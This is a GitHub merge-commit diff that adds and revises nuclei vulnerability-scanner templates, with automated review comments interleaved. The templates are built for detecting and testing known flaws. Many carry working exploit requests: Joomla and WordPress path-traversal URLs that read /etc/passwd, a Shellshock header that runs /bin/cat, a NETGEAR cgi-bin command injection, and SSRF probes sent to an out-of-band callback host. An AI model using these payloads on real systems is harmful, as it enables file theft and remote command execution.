Merge pull request #88 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-09-04 16:44:54 +05:30 committed by GitHub
commit d01835f36f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
109 changed files with 2223 additions and 891 deletions

@ -32,4 +32,5 @@ jobs:
- name: Template Validation
run: |
nuclei -validate -t . -exclude .pre-commit-config.yaml
nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
shell: bash

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
**146 directories, 1962 files**.
**147 directories, 1989 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
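Review bot: this table duplicates, line for line, the one changed in the README hunk above, so the two copies can drift apart; they agree here only because both were regenerated in the same commit. If a script produces these statistics, commit the generated file once and have the README reference it, or regenerate both in the same CI step, so that a hand edit to one file cannot leave the other stale.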

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
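Review bot: the `name` field says "Saber Cart" while the description and the `option=com_sebercart` request both spell the component "Seber Cart"; fix the spelling in `name` so the generated template list and name searches agree with the component's actual name.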

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1470
info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1476
info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1494
info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-1980
info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
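Review bot: the `name` gives the affected version as "Joomla! Flickr 1.0" while the description says the vulnerable component is 1.0.3, and "Joomla! Component Joomla! Flickr" repeats the product word; rename along the lines of `Joomla! Component Joomla Flickr 1.0.3 - Local File Inclusion` so the title and the description state the same version.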

@ -0,0 +1,27 @@
id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -0,0 +1,27 @@
id: CVE-2010-2122
info:
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12623
- https://www.cvedetails.com/cve/CVE-2010-2122
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
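Review bot: the description attributes the traversal to the `controller` parameter, but the request exercises `task=download&fileid=`; one of the two is wrong. Check the linked exploit-db entry and make the description name the parameter the template actually sends. Likewise `name` says "Local File Disclosure" while the description says "include and execute arbitrary local files", which are different impacts; pick the one the reference supports.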

@ -24,6 +24,7 @@ requests:
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

@ -25,11 +25,14 @@ requests:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

@ -0,0 +1,27 @@
id: CVE-2015-4050
info:
name: ESI unauthorized access
author: ELSFA7110,meme-lord
severity: high
description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
tags: cve,cve2015,symfony,rce
reference:
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
requests:
- method: GET
path:
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Credits"
part: body
- type: status
status:
- 200
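Review bot: the `name` "ESI unauthorized access" never mentions Symfony, the product the description is about, so the template is hard to find by name; prefer something like `Symfony 2.x HttpKernel ESI unauthorized access (CVE-2015-4050)`. The `rce` tag also overstates what this template confirms: the matcher only looks for the "PHP Credits" page returned by the `_controller=phpcredits` fragment, which demonstrates the signing bypass, not code execution.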

@ -0,0 +1,22 @@
id: CVE-2015-5461
info:
name: StageShow <= 5.0.8 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
reference:
- https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
- https://nvd.nist.gov/vuln/detail/CVE-2015-5461
tags: redirect,cve,cve2015,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

@ -0,0 +1,27 @@
id: CVE-2016-6277
info:
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
author: pikpikcu
severity: critical
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
tags: cve,cves2016,netgear,rce,iot
reference:
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
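Review bot: the tag `cves2016` is a typo for `cve2016`; with the typo, `-tags cve2016` runs and the per-year counts in TEMPLATES-STATS.md will silently skip this template. Fix the tag before merge.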

@ -89,7 +89,7 @@ requests:
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

@ -0,0 +1,24 @@
id: CVE-2017-18638
info:
name: Graphite 'graphite.composer.views.send_email' SSRF
author: huowuzhao
severity: high
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
tags: cve,cve2017,graphite,ssrf,oob
requests:
- method: GET
path:
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@ -33,8 +34,9 @@ requests:
- '"name":'
- '"avatar_urls":'
condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'
- '"name":"[^"]*"'

@ -4,6 +4,7 @@ info:
name: WordPress Plugin Localize My Post 1.0 - LFI
author: 0x_Akoko,0x240x23elu
severity: high
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cve,lfi
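Review bot: `reference:` is a bare string here while the other templates touched in this PR use a list; switch to the list form so the NVD entry for this CVE can sit next to the exploit-db link without another format change later.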

@ -0,0 +1,30 @@
id: CVE-2018-8719
info:
name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
author: LogicalHunter
severity: medium
description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
reference:
- https://www.exploit-db.com/exploits/44371
- https://vuldb.com/?id.115817
- https://www.cvedetails.com/cve/CVE-2018-8719/
tags: wordpress,wp-plugin,cve,cve2018,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[TXT]"
- ".log"
- "Index of"
condition: and
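Review bot: the word matcher requires an Apache-style directory listing (`Index of`, `[TXT]` and `.log` joined with `condition: and`), but the description says the problem is that the log files under `wp-content/uploads/wp-security-audit-log/` are not access-restricted. A site with directory listing disabled but the files still readable will be reported as not vulnerable; if the reference documents a predictable log filename, add a second request that fetches it directly, and otherwise state the listing dependency in the description. The description is also missing its final period.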

@ -18,7 +18,6 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- "phpmyadmin.net"

@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

@ -4,7 +4,10 @@ info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:

@ -20,7 +20,7 @@ requests:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

@ -0,0 +1,30 @@
id: CVE-2019-17503
info:
name: Kirona Dynamic Resource Scheduling - information disclosure
author: LogicalHunter
severity: medium
description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file
reference:
- https://www.exploit-db.com/exploits/47498
- https://nvd.nist.gov/vuln/detail/CVE-2019-17503
tags: cve,cve2019,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/osm/REGISTER.cmd"
- "{{BaseURL}}/osm_tiles/REGISTER.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "DEBUGMAPSCRIPT=TRUE"
- "@echo off"
condition: and
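Review bot: the description has a stray underscore ("directly _ it contains") where a comma or semicolon belongs, and no final period; fix the punctuation. The `name` also uses lower-case "information disclosure" where the other templates in this PR write "Information Disclosure".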

@ -8,6 +8,8 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
@ -17,7 +19,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"

@ -1,26 +0,0 @@
id: CVE-2019-9618
info:
name: GraceMedia Media Player 1.0 - Local File Inclusion
author: 0x_Akoko
severity: critical
reference:
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
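Review bot: deleting this duplicate of CVE-2019-9618 is the right call, and the surviving copy (the hunk above) already picks up the exploit-db and NVD references. Two things to confirm before merge: the surviving template's request path is outside the shown context, so check that it also requests `gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=`, and note that the deleted copy matched `root:[x*]:0:0` while the survivor keeps `root:.*:0:0`, which is the broader of the two, so no detection is lost by keeping the survivor's regex.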

@ -0,0 +1,34 @@
id: CVE-2020-11547
info:
name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
author: x6263
severity: medium
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
reference:
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
tags: cve,cve2020,prtg,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')"
part: body
- type: word
words:
- "prtg_network_monitor"
part: body
- type: status
status:
- 200
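Review bot: the `part: body` line under the `dsl` matcher is redundant, because the expression already names `body_1` and `body_2` explicitly; drop it so nobody reads `part` as scoping a dsl expression. The extra parentheses in `contains((body_1), ...)` and `contains((body_2), ...)` can also be simplified to `contains(body_1, ...)`.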

@ -0,0 +1,25 @@
id: CVE-2020-28976
info:
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author: LogicalHunter
severity: high
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

@ -4,6 +4,7 @@ info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395

@ -13,9 +13,6 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET
path:
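Review bot: the two removed `#` comment lines were the only explanation of what this template exploits (the `kivis.php` `pid` parameter reaching `shell_exec` in LinuxKI Toolset <= 6.01); unless the hunk also adds an equivalent `description:` under `info`, move that text there rather than deleting it, so the template stays documented and the text shows up in scan output.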

@ -0,0 +1,36 @@
id: CVE-2021-22145
info:
name: ElasticSearch 7.13.3 - Memory disclosure
author: dhiyaneshDk
severity: medium
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
tags: cve,cve2021,elascticsearch
requests:
- method: POST
path:
- '{{BaseURL}}/_bulk'
headers:
Content-Type: application/json
body: |
@
matchers-condition: and
matchers:
- type: word
words:
- 'root_cause'
- 'truncated'
- 'reason'
part: body
condition: and
- type: status
status:
- 400
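Review bot: the tag `elascticsearch` is misspelled (should be `elasticsearch`), so product-tag runs will miss this template. `name` writes "ElasticSearch" while the description uses "Elasticsearch"; use the vendor's spelling in both. The upstream reference URL carries the same misspelling in its filename, which is fine because that is the real path.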

@ -18,7 +18,9 @@ requests:
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
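Review bot: adding `redirects: true` with `max-redirects: 2` to an open-redirect template means the matchers evaluate the response from the final hop (example.com) rather than the redirect itself, so a status match proves little and every scan sends outbound traffic to a third-party host. The other redirect templates in this PR match the `Location` header with `part: header` and do not follow redirects; use the same approach here and drop the two redirect options.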

@ -0,0 +1,20 @@
id: CVE-2021-24288
info:
name: AcyMailing < 7.5.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
tags: wordpress,cve,cve2021,redirect,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
